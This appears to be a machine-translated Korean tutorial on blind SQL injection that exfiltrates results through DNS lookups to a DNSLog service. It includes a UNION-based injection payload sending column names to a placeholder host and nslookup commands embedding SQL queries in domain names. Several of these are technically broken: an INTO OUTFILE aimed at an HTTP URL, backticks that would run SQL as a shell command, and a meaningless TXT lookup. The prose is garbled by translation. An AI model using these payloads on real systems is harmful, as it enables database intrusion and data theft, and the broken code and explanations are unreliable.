DNSLog 에코 주입 없음 사용

DNSLog 개념

DNSLog(도메인 이름 시스템 로그)는 DNS(도메인 이름 시스템) 프로토콜을 통해 이루어진 요청 및 응답을 캡처하고 기록하기 위한 특수 기술 및 서비스입니다. 그 목적은 사용자가 DNS 트래픽을 추적, 분석 및 관리하고 도메인 이름과 관련된 정보를 수집하도록 돕는 것입니다.

기본적으로 DNSLog 서비스는 요청을 로그에 보관하고 각 요청에 대해 고유한 도메인 이름을 생성하는 사용자 지정 DNS 서버를 제공합니다. 클라이언트(예: 웹 브라우저, 애플리케이션)가 DNS 요청을 보내면 서버는 요청을 기록한 다음 원래 요청에 대한 일부 정보가 포함된 응답을 생성합니다. 이 정보에는 IP 주소, 사용자 에이전트 문자열, 타임스탬프 및 기타 관련 데이터가 포함될 수 있습니다.

DNSLog No Echo 주입 원리

Echoless 주입은 주입 지점에서 직접 응답을 얻을 수 없을 때 DNSLog를 통해 주입 결과를 얻는 주입 방법을 말합니다. 에코리스 인젝션의 원리는 인젝션 결과를 DNS 요청의 일부로 사용하고 DNSLog를 통해 DNS 요청의 응답을 받아 인젝션 결과를 얻는 것입니다.

DNSLog를 사용하여 에코 없는 주입을 구현하는 단계

  1. 주입 페이로드 구성: 대상 애플리케이션의 주입 지점에 따라 DNS 요청을 트리거하는 데 사용되는 주입 페이로드를 구성합니다. 예를 들어 SQL 주입 공격의 경우 다음과 같은 페이로드를 사용할 수 있습니다.

    ' OR 1=1 UNION SELECT 1, group_concat(column_name) FROM information_schema.columns INTO OUTFILE 'http://your-dnslog-service.com/' --
    

    이 페이로드는 대상 애플리케이션에서 DNSLog 서비스로 열 이름 정보를 전송하는 DNS 요청을 트리거합니다.

  2. 페이로드 삽입: 대상 애플리케이션의 주입 지점에 페이로드를 삽입합니다. 정확한 방법은 대상 애플리케이션의 구조와 취약성에 따라 다릅니다. 일반적으로 주입 지점은 애플리케이션의 입력 필드에 있습니다.

  3. 트리거 인젝션: 인젝션 페이로드에 의해 처리된 요청을 애플리케이션에 제출하여 인젝션 공격을 트리거합니다.

  4. DNSLog 서비스 확인: 선택한 DNSLog 서비스를 방문하여 DNS 요청이 수신되었는지 확인합니다. 주입이 성공적으로 실행되면 DNSLog 서비스에 기록된 해당 요청을 볼 수 있습니다.

밤을 주다

DNSLog를 사용하여 데이터베이스 테이블 정보 가져오기

주입 지점: 대상 애플리케이션에서 주입 지점을 찾아 주입 문을 구성합니다.

SELECT table_name FROM information_schema.tables WHERE table_schema=database()

 

DNS 요청의 일부로 인젝션 문을 DNSLog 서버에 보냅니다.

nslookup `SELECT table_name FROM information_schema.tables WHERE table_schema=database()`.example.com

 

주입 결과를 얻기 위해 DNSLog 서버에서 DNS 요청의 응답을 봅니다.

nslookup -type=txt SELECT.*.example.com

도표 

큰놈님의 글을 참고하시면 됩니다.

 SQL 인젝션 dnslog 인젝션 – ngin0x의 블로그

 

Acho que você gosta

Origin blog.csdn.net/qq_56698744/article/details/131779901
Recomendado
Clasificación